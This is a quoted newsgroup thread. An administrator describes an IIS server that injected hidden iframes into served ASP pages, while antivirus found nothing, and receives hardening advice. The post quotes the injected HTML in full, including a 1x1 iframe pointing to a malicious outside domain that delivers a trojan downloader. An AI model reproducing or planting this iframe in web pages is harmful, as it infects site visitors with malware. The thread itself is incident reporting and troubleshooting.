We had to reinstall IIS on the server and it did the trick.
didn't found anything. And after our tests, IIS was really compromise.
Any website running asp or aspx pages inject the iframe code. The hack
seems to have been at the core of IIS. ASAPI filter desactivation
> In article <uelbG$kGHHA.924@TK2MSFTNGP02.phx.gbl>,
> PaulOliver@noemail.noemail says...
> > Our website was compromised sometime in the last few days, but our
> > Antivirus (Symantec Corporate) when run on the server doesn't detect it.
> >
> > It is a Windows Server 2003 Standard server, running SP1 and all the
> > latest patches. IIS sends down a website to the user with IFRAMEs
> > injected into the HTML:
> >
> > <TD><TABLE><TR><TD><A HREF=3D"news.asp?ID=3D194" TARGET=3D_self ><IMG
> > NAME=3D"news194" SRC=3D"images/newsClip.png" ALT=3D"*" BORDER=3D0
> > ></A></TD><TD><A HREF=3D"news.asp?ID=3D194" TARGET=3D_self
> > CLASS=3D"ltblue"></a><iframe src=3D
http://xaqjlyswly.biz/dl/adv448.php > > width=3D1 height=3D1></iframe></TD></A></TR></TABLE></TD>
> >
> > The iframe code above pointing to xaqjlyswly.biz does not come from our
> > code. I looked at the ASP function that generates this link and there
> > is nothing there that would put that on the page.
>
> The reason that Symantec didn't detect it on the server is because the
> threat (malware) is not on your server, it's on the remote server.
>
> > The iframe tries to get the user's browser to download the Downloader
> > virus which, according to Symantec "connects to the Internet and
> > downloads other Trojan horses"
> >
> >
http://www.symantec.com/security_response/writeup.jsp?docid=3D2002-1015= 18-4323-99
> >
> > My local antivirus on my machine caught downloader getting installed
> > after browsing the site on the infected server.
> >
> > I used Agent Ransack to look for the string ".biz" across all our
> > websites source code. The string wasn't found anywhere.
> >
> > That all leads me to believe that something is getting injected into the
> > code before it is sent to the end user.
> >
> > I found an older virus that has similar characteristics called
> > Download.Ject which infected IIS also. I followed Microsoft's
> > suggestions for detecting Download.Ject and we don't have it.
> >
> > Any ideas?
>
> Put a real firewall in front of your server, block all foreign subnets
> not required, rename the administrator account and disable all accounts
> not needed, patch the server, etc... Follow ALL of the recommendations
> that secure your server.
>
> What services, other than HTTP did you expose?
>=20
> --=20
>=20
> spam999free@rrohio.com
> remove 999 in order to email me